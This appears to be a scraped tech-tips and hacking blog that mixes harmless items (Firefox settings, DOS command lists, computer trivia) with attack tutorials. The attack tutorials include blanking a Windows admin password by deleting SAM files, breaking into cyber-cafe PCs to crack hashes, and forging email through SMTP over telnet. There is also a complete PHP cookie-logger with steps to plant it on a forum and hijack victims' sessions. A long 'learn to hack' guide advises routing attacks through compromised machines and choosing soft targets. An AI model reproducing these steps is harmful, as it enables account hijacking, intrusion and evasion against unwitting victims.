Delete Admin Password latest




Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\configin your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind. 

Lock Your Computer

In. Right click an empty spot on the desktop, point to New and click Shortcut.

 the Create Shortcut dialog box, type or copy/paste in the following into the 'Type the location' of the item text box:

rundll32 user32.dll,LockWorkStation

3. Click Next

4. In "Type a name for this shortcut" (any name u wish to keep) and Click Finish

Reduce Firefox Loading Time

 Optimize Your Firefox Page Loading Time
  • Type about:config into the the Filter field
  • Set browser.cache.disk.enable to false (double click it)
  • Set browser.cache.memory.enable to true (double click it)
  • Right click > New > Integer; type browser.cache.memory.capacity; press OK
  • Type in 100000 (this is equivalent to 100 megabytes); press OK
  • Close all Firefox tabs and windows, and then restart the browser

Windows 8 SHORTCUT KEYS latest updated



Command Prompt:
ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
ARP Displays, adds, and removes arp information from network devices.
ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACL's.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.
COLOR Easily change the foreground and background color of the MS-DOS window.
COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.

mozilla advantages

Advantages Of Mozilla Firefox Browser

Mozilla firefox is an open source browser.It holds 23.81% of worldwide usage share of web browsers, and is just behind internet explorer(IE).IE has managed to stay ahead over firefox due to the fact that IE has been pre installed on the microsoft windows and most users even do not bother to search for some better web browser.In this post we will be analysing the merits and demerits of the firefox browser.


Customizable: Firefox is best known for the freedom it provides to its user for the customization of the browser.User can apply themes of their own taste to the browser.The availability of themes is not at all a problem for firefox users.


Availability Of Plugins:Firefox has the maximum number of plugins as compared to other well known browsers such as google chrome and Internet Explorer.Plugins are easy to install and recieves updates frequently.It has a wide range of plugins like for web development,Search Engine Optimisation (SEO),User Interface etc available for downloads.

Browsing And Downloading Speed: Frefox claims itself to be fastest browser available in the market.We have found this fact to be completely true.With every new version of the browser we have found a significant increase in the speed of the browsing.The Inbuilt download manager of the browser is also capable of downloading at high speeds as compared to the inbuilt download managers of chrome and internet explorer which provides very slow speeds.But we certainly reccomend you to use some special download manager.

Open Source :Firefox is an open source browser.So its code is available to you.If you are a good programmer then you will be able to completely customize according to your needs and certainly this is a huge advantage over internet explorer.

Security:It is the most secure browser currently available in the market.The number of security bugs are far less in firefox browser as compared to other browser

.
WordPress Tags: advantages,Mozilla,Firefox,Browser,usage,explorer,fact,users,demerits,Customizable,freedom,user,themes,Plugins,Internet,development,Search,Engine,Optimisation,Interface,Frefox,version,Inbuilt,manager,managers,Open,Source,programmer,advantage,browsers,chrome

Old Computers Facts


1.The Apple Lisa (1983) was the first successful computer with a graphical user interface (GUI) and a mouse. It cost $10,000.
2.The GRiD 1101 is the grand-daddy of all modern-day laptops. It cost over $8000 in 1982.
3.Their new VIC-20 (1980) was so embarrassing to parent company Commodore, that they considered giving them away. Instead, it sold over 1,000,000 units within just a few years, making Commodore hundreds of millions of dollars.
4.The first portable Macintosh computer, the Macintosh Portable (1989) weighs 16 pounds and had a 16MHz processor.
5.The first-ever handheld/palmtop MS-DOS "PC" was the Portfolio, sold by --- Atari, in 1989.
6.The first "IBM" computer to run on batteries was the IBM Convertible PC from 1986.

How TO Hack A Shut Down Pc

here is a quick new hack on how to intrude in the PC which is shut downed at Cyber cafe. (Don’t Forget to read our disclaimer at the bottom of the post.)
1. As you all must have know these days all Cyber cafe owners have a program for administration to control all PC’s in local area network. So all files can be inter transmitted.
2. First of all press Ctrl+Alt+Del the task manager or any controlling application, will open. Then from APPLICATIONS select the program that is controlling all PC’s  & terminate it, This is for security reason. Now log of PC, & you ll get user names of the PC.
3. But some times, cyber cafes have security clients installed that have restricted access to Task Manager
, restart the computer & press F8 continuously before windows boots.
The Menu will open, select Safe Mode from it. And now you can copy files from networked PC’s without any  security layer.
Next step is where you’ll need to crack the hashes.  SO go to your home PC , Download & install Saminside cracking tool. And from some another Cyber cafe try to crack the hashes of that PC. By same log off method explained below.
This where you actually perform hacking. Have a gret time & tell us weather it worked for you.
Meanwhile if you can get IP address,  of the PC you wish to hack try to get it from ip-explorer.com, but this is not the part of this hack its sort of next step of hacking from outside the network.


Disclaimer : The trick here explained it for educational purpose only & not to  perform illegal or criminal activities. Don’t forget hacking into some one’s privacy is considered as crime. SO do it on your home network that you own or something.  We are not responsible for anything you do & consequences of it by using our articles.

Find If Whether Your Computer Can Run A Game Or Not

If you play only Mines sweeper or Solitaire in your computer or play online flash games then you don’t need this service as these games can be run on any computer.But if you play games created by gaming companies like EA,Ubisoft etc then this trick will come handy.

As there are lot of games and to play these games your computer needs to have some minimum specifications otherwise the game won’t run. “Can You Run It?” is an useful free online service that automatically scans your computer and checks whether you can run a specific game or not.

How To Find If Your Computer Can Run A Game Or Not ?

  1. Visit Can you run it? Website
  2. Now you have to select the game which you want to test.You can either type the name of the game or select it from dropdown menu.
  3. Once you have  selected your game click on Can you Run it? Button
  4. For running the test on your computer, it downloads a small ActiveX component (Internet Explorer) or Java Applet(Firefox/Chrome) and scans your systems configuration.
  5. It will give a detailed result with information about each component and will also tell you at which point your computer fails in meeting the requirements.
  6. I have tested  Call Of Duty: Modern Warfare 2 in my computer and here are the results

Can You Run It? Is a great service that will help you decide whether you should buy or download a game or no

Windows Live Tags: Find,Whether,Computer,Game,Mines,Solitaire,Ubisoft,specifications,Visit,Website,menu,Once,Button,ActiveX,component,

Send Protected Email Messages With PassWord

If you have to send some confidental information like credit card numbers,Bank details etc it may not be secure to send it without any encryption and password protection.Hackers can use sniffers to intercept your email messages or they can retrieve the data after hacking email accounts.To protect yourself from such situations you can use Lockibin which provides password protection and AES-256 bit encryption to your emails.

How to Send Password Protected Email Messages:

  • Click here to go LockBin online service.
  • Fill the form with your desired password.
  • In the text filled write your message. You can also attach a file if you want.

clip_image002

  • After this, click on Submit button.
  • Now your password protected mail will be sent. (Receiver will only get a link to your password protected and encrypted email)
  • When receiver clicks on that link  it will prompt to enter the password otherwise it will not be open.

clip_image004

That’s it! But you have to send password to your friend which can be sent on Mobile number or you can send a normal Email for it.The password protected email is stored in lockbin server itself.

Windows Live Tags: Send,Email,Messages,PassWord,information,card,Bank,protection,Hackers.

Check All Email Accounts From Gmail

Gmail was officially announced by google on 1 april 2004 i.e on the april fool’s day.It is more popular then one of the oldest Email service provider AOL.

Gmail has been popular amongst users because it provides almost unlimited storage capacity for emails and also due to its good spam filter.Now a days everybody has more than one Email accounts.I personally have 10+  email accounts of yahoo,Gmail,Hotmail,Aol and it is difficult to manage all of them.So now I have configured all of them to my Gmail account and now I can check and send email’s of all email accounts from my single Gmail account and it had really made my life easy.

You can configure 5 email accounts from any email service provider like Gmail,yahoo,Aol,hotmail etc to your Gmail account.

Here is the step by step tutorial with screenshots on How To Check All Email Accounts From Gmail

  1. Login into your Gmail account that you want to use as a master email account.
  2. Click on Settings option present at the top (near signout)

clip_image002

JavaScript Tricks

images

Play the “Lord of the Web”

This code lets you edit any page/website in real-time . With Firefox, you can even edit and save the modified pages to your computer. Very nifty code!

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

The Big Wheel

This piece of code pulls off all the images from your web page and rotates them in a circle. Really makes any page go naked (without its images). The best place to test is a website with many images. (Google Images for an example)

Make Your Computer Faster

Remove Spyware and Protect your Computer against Viruses

The first thing you should diagnose your slow computer for is virus infection. Viruses can come into your computer so far there is a contact between your computer and other computers – this can also be through the internet.

To battle virus infection, you must have a reliable antivirus program installed on your computer. This antivirus program must be kept up to date, regularly. The most important thing in having an antivirus program is keeping it updated regularly. With my computer which I use for my blog that talks about discounts for weight watchers and bistro md coupon, I have made it a point of duty to see that my antivirus program is of the latest version and I don’t miss an update.

Make access to data easy for your computer

When accessing data on your computer’s hard disk becomes difficult for your system it will result in your computer performing slow. The data on your computer’s hard drive may become cluttered and result in causing your computer to become slow in performance.

Send SMS Without Registration

Smsti.in allows you send message of complete 160 words and without any ads.There message service is very fast and you can even check the delivery reports of the sms that has been sent.
They provide their sms services for Indian Mobile numbers only.
Seasms allows you to send messages all over the world.This is the only free Sms service that I found which all allows you to send worldwide messages anonymously.

Wireless Networks

Wireless Networks
Introduction
As the need of communication became more and more demanding, new technologies in the field of networks developed. One of them is the use of wireless networks. It is the transmission of data from source to destination without the use of wires as the physical media.
Why to use Wireless?
Three reasons may be stated for the over-growing use of wireless networks across the world:
  1. They are ubiquitous networks. As the do not require messy wires as a medium of communication, they can be used to connect far-off places.
  2. They are cheaper than wired networks specially in the case of long-distance communication.
  3. They are pretty effective and fast, especially with the modern advancements in this field.

The Best Key Loggers


how to use telnet


basics on hacking


Latest Google Tricks 2013


Looking for the ultimate tips for Google searching? You've just found the only guide to Google you need. Let's get started:1. The best way to begin searching harder with Google is by clicking the Advanced Search link.2. This lets you search for exact phrases, "all these words", or one of the specified keywords by entering search terms into the appropriate box.3. You can also define how many results you want on the page, what language and what file type you're looking for, all with menus.4. Advanced Search lets you type in a Top Level Domain (like .co.uk) in the "Search within site of domain" box to restrict results.5. And you can click the "Date, usage rights, numeric range and more" link to access more advanced features.


Speed Up Your FireFox

Speed Up Firefox 3x-30x Faster


1. Open Firefox


2. Type “about:config” into the address bar and hit return.
Scroll down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really speeds up page loading.

FOUNDERS AND HEAD QUATERS

Fredrik Indestam and Leo Mechelin 
1) Nokia: Founder - Fredrik Indestam and Leo Mechelin Headquarters - Finland.

Cracking Methods

 

 

Cracking-ideas-March-2010

1. Dictionary attack

"This uses a simple file containing words that can, surprise surprise, be found in a dictionary. In other words, if you will excuse the pun, this attack uses exactly the kind of words that many people use as their password..."

2. Brute force attack

"This method is similar to the dictionary attack but with the added bonus, for the hacker, of being able to detect non-dictionary words by working through all possible alpha-numeric combinations from aaa1 to zzz10..."

3.Phishing

"There's an easy way to hack: ask the user for his or her password. A phishing email leads the unsuspecting reader to a faked online banking, payment or other site in order to login and put right some terrible problem with their security..."

4. Social engineering

"A favourite of the social engineer is to telephone an office posing as an IT security tech guy and simply ask for the network access password. You’d be amazed how often this works..."

5. Malware

"A key logger or screen scraper can be installed by malware which records everything you type or takes screen shots during a login process, and then forwards a copy of this file to hacker central..."

6. Spidering

"Savvy hackers have realised that many corporate passwords are made up of words that are connected to the business itself. Studying corporate literature, website sales material and even the websites of competitors and listed customers can provide the ammunition to build a custom word list to use in a brute force attack..."

WordPress Tags: Methods,Dictionary,password,Brute,method,bonus,combinations,user,reader,payment,Social,office,Malware,Savvy,passwords,literature,sales,competitors,customers,ammunition,custom,hacker,login

what are special features in android kit kat


Latest Tralier Shudh Desi Romance


who is rafael nadal?


Ganesh Chaturthi Special


ethical hacking


what is hacking?



hacking tricks



pc firewall top 10


delete cookies chrome


wireless hacking

WiFi v2.0.4




Posted Image
  v2.0.4 | 1.8 MB
Who Is On My Wifi - a tool to scan Wifi networks in the presence of unidentified intruders and a PC with your internal network. The utility will show you each computer on the network, and warns you if it detects any bogus connections allows you to protect your network from the drop speed Internet, hackers and computer to which you are not allowed to use your connection.

Are People On Your Network Right Now?






http://www.mediafire.com/?4oe5bvnvbnao98f

Hacking Telnet


Want a computer you can telnet into and mess around with, and not get into trouble no matter what you do to it? I've set up my
techbroker.com (206.61.52.33) with user xyz, password guest for you to play with. Here's how to forge email to xyz@techbroker.com using
telnet. Start with the command:
C:\>telnet techbroker.com 25
Connecting To Techbroker.com
220 Service ready
Now you type in who you want the message to appear to come from:
helo santa@techbroker.com
Techbroker.com will answer:
250 host ready
Next type in your mail from address:
mail from:santa@techbroker.com
250 Requested mail action okay, completed
Your next command:
rcpt to:xyz@techbroker.com
250 Requested mail action okay, completed
Your next command:
data
354 Start main input; end with .
Newbie note: just means hit return. In case you can't see that little period between the s, what you do to end composing your email is to hit enter, type a period, then hit enter again.
Anyhow, try typing:
This is a test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel
Connection to host lost.
Using techbroker's mail server, even if you enable full headers, the
message we just composed looks like:
Status: R
X-status: N
This is a test.
That's a pretty pathetic forged email, huh? No "from", no date.
However, you can make your headers better by using a trick with the data command. After you give it, you can insert as many headers as you choose. The trick is easier to show than explain:
220 Service ready
helo santa@northpole.org
250 host ready
mail from:santa@northpole.com
250 Requested mail action okay, completed
rcpt to:
250 Requested mail action okay, completed
data
354 Start main input; end with .
from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel
Connection to host lost.
The message then looks like:
from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
The trick is to start each line you want in the headers with one word
followed by a colon, and the a line followed by "return". As soon as
you write a line that doesn't begin this way, the rest of what you
type goes into the body of the email.
Notice that the santa@northpole.com from the "mail from:" command didn't show up in the header. Some mail servers would show both "from" addresses.
You can forge email on techbroker.com within one strict limitation.
Your email has to go to someone at techbroker.com. If you can find any way to send email to someone outside techbroker, let us know, because you will have broken our security, muhahaha! Don't worry, you have my permission.
Next, you can read the email you forge on techbroker.com via telnet:
C:\>telnet techbroker.com 110
+OK <30961.5910984301@techbroker.com> service ready
Give this command:
user xyz
+OK user is known
Then type in this:
pass test
+OK mail drop has 2 message(s)
retr 1
+OK message follows
This is a test.
If you want to know all possible commands, give this command:
help
+OK help list follows
USER user
PASS password
STAT
LIST [message]
RETR message
DELE message
NOOP
RSET
QUIT
APOP user md5
TOP message lines
UIDL [message]
HELP


Unless you use a weird online provider like AOL, you can use these
same tricks to send and receive your own email. Or you can forge email to a friend by telnetting to his or her online provider's email
sending computer(s).

delete cookies

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.

What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

Download it.

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;

if (isset($_GET["cookie"]))

{

if (!$handle = fopen($filename, ‘a’))

{

echo “Temporary Server Error,Sorry for the inconvenience.”;

exit;

}

else

{

if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)

{

echo “Temporary Server Error,Sorry for the inconvenience.”;

exit;

}

}

echo “Temporary Server Error,Sorry for the inconvenience.”;

fclose($handle);

exit;

}

echo “Temporary Server Error,Sorry for the inconvenience.”;

exit;

?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php

logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)

fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Download it.

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only

Enjoy !!

Windows Live Tags: File,Cookie,Logger,Hope,Step,Save,notepad,Rename,Download,Copy,_GET,Temporary,Server,Error,Sorry,FALSE,

user name check

NameChk is free online tool that helps you to check username availability on various sites. Check Username Availability on More than 80 sites: • Go to NameChk website. • In the text field type the username that you want to set and click on CHK button. • Now the list will be displayed on which site the username is available and taken. This tool is very helpful for those who often make their accounts online for promoting their brand or website. http://namechk.com/

Windows Live Tags: user,NameChk,tool,Check,Username,text,website

How to learn to hack

      How to learn to hack in easy steps

      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Hi there, I'm TDC and I'd like to give back all the things i've learnt from the hackers i've

      met. I want to write this because most tutorials i've found (very good tutorials) are now

      old and don't fit just like they did before. This is why i'm going to teach you and show you

      the way to learn to hack.

      If you are a hacker, you read this, and find something that's not correct or you don't like,

      i want to know. mail me.

      I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and

      i don't care at all as long as it's understandable.

      On this document I talk about many security tools, you can find all them and also contact

      me on my site: www.3b0x.com

      When you finish reading it, please TELL ME how you like it!

      I want to make newer versions of it, check on my site to stay informed.

      COPYING: You're welcome to distribute this document to whoever the hell you want, post it

      on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.

      If you want to perform it, ask me for permission. thanks a lot!

      DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to

      promote computer crime and I'm not responible of your actions in any way.

      If you want to hack a computer, do the decent thing and ask for permission first.

      Let's start

      ~~~~~~~~~~~

      If you read carefully all what i'm telling here, you are smart and you work hard on it,

      you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).

      A hacker is someone who is able to discover unknown vulnerabilities in software and able to

      write the proper codes to exploit them.

      NOTE: If you've been unlucky, and before you found this document, you've readen the

      guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.

      You won't understand some things from my tutorial until you unpoison your brain.

      Some definitions

      ~~~~~~~~~~~~~~~~

      I'm going to refer to every kind of computer as a box, and only as a box.

      This includes your PC, any server, supercomputers, nuclear silos, HAL9000,

      Michael Knight's car, The Matrix, etc.

      The systems we're going to hack (with permission) are plenty of normal users, whose

      don't have any remote idea about security, and the root. The root user is called

      superuser and is used by the admin to administer the system.

      I'm going to refer to the users of a system as lusers. Logically, I'll refer to

      the admin as superluser.

      Operating Systems

      ~~~~~~~~~~~~~~~~~

      Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,

      or perhaps a mac (motorola) box running macOS.

      You can't hack with that. In order to hack, you'll need one of those UNIX derived operating

      systems.

      This is for two main reasons:

      -the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and

      so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better

      than running it at home?

      -all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless

      you're running some kind of it.

      Let's see where to find the unix you're interested on.

      The UNIX systems may be divided in two main groups:

      - commercial UNIXes

      - free opensource UNIXes

      A commercial unix's price is not like windoze's price, and it usually can't run on your box,

      so forget it.

      The free opensource UNIXes can also be divided in:

      - BSD

      These are older and difficult to use. The most secure OS (openBSD) is in this group.

      You don't want them unless you're planning to install a server on them.

      - Linux

      Easy to use, stable, secure, and optimized for your kind of box. that's what we need.

      I strongly suggest you to get the SuSE distribution of Linux.

      It's the best one as i think, and i added here some tips for SuSE, so all should be easier.

      Visit www.suse.de and look for a local store or order it online.

      (i know i said it the software was free, but not the CDs nor the manual nor the support.

      It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)

      If you own an intel box, then order the PC version.

      If you own a mac box, then order the PowerPC version.

      Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.

      It's possible you have problem with your hardware on the installation. Read the manual, ask

      for technical support or buy new hardware, just install it as you can.

      This is really important! READ THE MANUAL, or even buy a UNIX book.

      Books about TCP/IP and C programming are also useful.

      If you don't, you won't understand some things i'll explain later. And, of course, you'll

      never become a hacker if you don't read a lot of that 'literature'.

      the Internet

      ~~~~~~~~~~~~

      Yes! you wanted to hack, didn't you? do you want to hack your own box or what?

      You want to hack internet boxes! So lets connect to the internet.

      Yes, i know you've gotten this document from the internet, but that was with windoze

      and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.

      You're a Linux user, and you gotta open your way to the Internet.

      You gotta make your Linux box to connect to the net,

      so go and set up your modem (using YaST2 in SuSE).

      Common problems:

      If your box doesn't detect any modems, that probably means that you have no modem installed

      :-D (not a joke!).

      Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are

      specifically designed to work ONLY on windoze. Don't blame linux, this happens because the

      winmodem has not a critical chip that makes it work. It works on windoze cause the vendor

      driver emulates that missing chip. And hat vendor driver is only available for windoze.

      ISA and external modems are more probably real modems, but not all of them.

      If you want to make sure wether a modem is or not a winmodem, visit http://start.at/modem.

      Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)

      NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the

      internet with aol. You can't hack with aol. i don't like aol. aol sucks.

      Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,

      leave aol and get a real ISP. Then you'll be forgiven.

      Don't get busted

      ~~~~~~~~~~~~~~~~

      Let's suppose you haven't skipped everything below and your Linux bow is now connected to the net.

      It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.

      - Don't hack

      this is the most effective stealth technique. not even the FBI can bust you. :-)

      If you choose this option, stop reading now, cause the rest is worthless and futile.

      - If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find

      your own website oe email address, find your ISP, your phone number, your home...

      and you get busted!!

      - be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.

      NEVER tell others you've hacked a box.

      - NEVER hack directly from your box (your_box --> victim's box).

      Always use a third box in the middle (your_box --> lame_box --> victim's box).

      Where lame_box is a previously hacked box or...a shell account box!

      A shell account is a service where you get control of a box WITHOUT hacking it.

      There are a few places where shell accounts are given for free. One of them is nether.net.

      - Don't hack dangerous boxes until you're a real hacker.

      Which boxes are dangerous:

      Military boxes

      Government boxes

      Important and powerful companies' boxes

      Security companies' boxes

      Which boxes are NOT dangerous:

      Educational boxes (any .edu domain)

      Little companies' boxes

      Japanese boxes

      - Always connect to the internet through a free and anonymous ISP

      (did i tell you that AOL is NOT an ISP?)

      - Use phreking techniques to redirect calls and use others' lines for your ISP call.

      Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.

      TCP ports and scanning

      ~~~~~~~~~~~~~~~~~~~~~~

      Do you got your stealth linux box connected to the internet (not aol)?

      Have you read the manual as i told you?

      Then we shall start with the damn real thing.

      First of all, you should know some things about the internet. It's based on the TPC/IP protocol,

      (and others)

      It works like this: every box has 65k connection PORTS. some of them are opened and waiting for

      your data to be sent.

      So you can open a connection and send data to any these ports. Those ports are associated with

      a service:

      Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs

      on the box, opens its port and offers their damn service.

      here are some common ports and their usual services (there are a lot more):

      Port number Common service Example daemon (d stands for daemon)

      21 FTP FTPd

      23 Telnet telnetd

      25 SMTP sendmail (yes!)

      80 HTTP apache

      110 POP3 qpop

      Example:

      when you visit the website http://www.host.com/luser/index.html, your browser does this:

      -it connects to the TCP port 80

      -it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'

      (it really sends a lot of things more, but that is the essential)

      -the host sends the html file

      The cool thing of daemons is they have really serious security bugs.

      That's why we want to know what daemons are running there, so...

      We need to know what ports are opened in the box we want to hack.

      How could we get that information?

      We gotta use a scanner. A scanner is a program that tries to

      connect to every port on the box and tells which of them are opened.

      The best scanner i can think of is nmap, created by Fyodor.

      You can get nmap from my site in tarball or rpm format.

      Let's install nmap from an .rpm packet.

      bash-2.03$ rpm -i nmap-2.53-1.i386.rpm

      then we run it:

      bash-2.03$ nmap -sS target.edu

      Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )

      Interesting ports on target.edu (xx.xx.xx.xx):

      (The 1518 ports scanned but not shown below are in state: closed)

      Port State Service

      21/tcp open ftp

      23/tcp open telnet

      25/tcp open smtp

      80/tcp open http

      110/tcp open pop3

      Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

      Nmap has told us which ports are opened on target.edu and thus, what services it's offering.

      I know, i said telnet is a service but is also a program (don't let this confuse you).

      This program can open a TCP connection to the port you specify.

      So lets see what's on that ports.

      On your linux console, type:

      bash-2.03$ telnet target.edu 21

      Trying xx.xx.xx.xx...

      Connected to target.edu.

      Escape character is '^]'.

      220 target.edu FTP server (SunOS 5.6) ready.

      quit

      221 Goodbye.

      Connection closed by foreign host.

      You see?

      They speak out some valuable information:

      -their operating system is SunOS 5.6

      -their FTP daemon is the standard provided by the OS.

      bash-2.03$ telnet target.edu 25

      Trying xx.xx.xx.xx...

      Connected to target.edu.

      Escape character is '^]'.

      220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0

      400 (EDT)

      quit

      221 2.0.0 target.edu closing connection

      Connection closed by foreign host.

      They like to tell us everything:

      -their SMTP daemon is sendmail

      -its version is 8.11.0/8.9.3

      Experiment with other ports to discover other daemons.

      Why is this information useful to us? cause the security bugs that can let us in depend

      on the OS and daemons they are running.

      But there is a problem here... such information can be faked!

      It's difficult to really know what daemons are they running, but we can know FOR SURE

      what's the operating system:

      bash-2.03$ nmap -sS target.edu

      Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )

      Interesting ports on target.edu (xx.xx.xx.xx):

      (The 1518 ports scanned but not shown below are in state: closed)

      Port State Service

      21/tcp open ftp

      23/tcp open telnet

      25/tcp open smtp

      80/tcp open http

      110/tcp open pop3

      TCP Sequence Prediction: Class=random positive increments

      Difficulty=937544 (Good luck!)

      Remote operating system guess: Linux 2.1.122 - 2.2.14

      Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

      Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!

      We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,

      but the information we've already gathered should be enough.

      This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know

      what's the OS there and its very difficult to avoid it.

      Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells

      you their difficulty is low, that means their TCP sequence is predictable and we

      can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.

      Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.

      And we don't want the admins to get angry with us, that's why we used the -sS option.

      This way (most) hosts don't detect ANYTHING from the portscan.

      Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better

      usage of nmap's features, read its man page:

      bash-2.03$ man nmap

      How to upload and compile programs

      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      The most obvious and simple way is using FTP:

      bash-2.03$ ls

      program.c

      sh-2.03$ ftp target.edu

      Connected to target.edu.

      220 target.edu FTP server (SunOS 5.6) ready.

      Name: luser

      331 Password required for luser.

      Password:

      230 User luser logged in.

      ftp> put program.c

      200 PORT command successful.

      150 ASCII data connection for program.c (204.42.253.18,57982).

      226 Transfer complete.

      ftp> quit

      221 Goodbye.

      But this is not a really good way. It can create logs that will make the admin to detect us.

      Avoid uploading it with FTP as you can, use cut&paste instead.

      Here's how to make it:

      we run a text editor

      sh-2.03$ pico exploit.c

      if it doesn't work, try this one:

      sh-2.03$ vi exploit.c

      Of course, you must learn how to use vi.

      Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,

      ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the

      text from it. Change to your target and paste the code so you've 'uploaded' the file.

      To cut a text from the screen, you need to install the gpm packet from your linux distribution.

      This program lets you select and cut text with your mouse.

      If cut&paste doesn't work, you can also type it by hand (they aren't usually large).

      Once you get the .c file there, here's how to compile:

      sh-2.03$ gcc program.c -o program

      and execute:

      sh-2.03$ ./program

      Exploiting vulnerabilities

      ~~~~~~~~~~~~~~~~~~~~~~~~~~

      This is the most important part of our hacking experience. Once we know what target.edu

      is running, we can go to one of those EXPLOIT databases that are on the net.

      A exploit is a piece of code that exploits a vulnerability on its software. In the case of

      target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon

      that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy

      exploitable. If your target gots an old version, you'll probably get in easyly.

      When we exploit a security bug, we can get:

      - a normal shell (don't know what a shell is? read a book of unix!)

      a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.

      this one lets us send commands to the box, but we got limited priviledges.

      - a root shell

      this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.

      These are some exploit databases i suggest you to visit:

      www.hack.co.za

      www.r00tabega.org

      www.rootshell.com

      www.securityfocus.com

      www.insecure.org/sploits.html

      Every exploit is different to use, so read its text and try them.

      They usually come in .c language.

